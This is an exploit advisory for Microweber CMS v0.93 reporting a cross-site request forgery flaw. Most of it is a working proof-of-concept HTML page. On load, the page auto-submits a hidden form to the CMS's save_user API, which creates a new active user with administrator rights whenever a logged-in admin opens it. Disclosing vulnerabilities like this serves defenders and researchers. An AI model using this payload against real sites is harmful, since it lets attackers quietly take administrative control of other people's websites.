###########################################################[~] Exploit Title: Microweber CMS v0.93 CSRF Vulnerability
[~] Author: sajith
[~] version: Microweber CMS v0.93[~]Vendor Homepage: http://microweber.com/[~] vulnerable app link:http://microweber.com/download
###########################################################[*] Application is vulnerable to CSRF.below is the POC where attacker can
use this vulnerability to create new user and assign Admin role to the user
<head><title>POC by sajith shetty</title></head><body><form action="
http://127.0.0.1/cms/microweber-0.9343/microweber-master/api/save_user"
id="formid" method="post"><inputtype="hidden" name="id" value="0"/><inputtype="hidden" name="thumbnail" value=""/><inputtype="hidden" name="username" value="test1"/><inputtype="hidden" name="password" value="mypassword"/><inputtype="hidden" name="email" value="test@testing.com"/><inputtype="hidden" name="first_name" value="abc"/><inputtype="hidden" name="last_name" value="xyz"/><inputtype="hidden" name="is_active" value="y"/><inputtype="hidden" name="is_admin" value="y"/><inputtype="hidden" name="basic_mode" value="n"/><inputtype="hidden" name="api_key" value="1234"/></form><script>
document.getElementById('formid').submit();</script></body></html>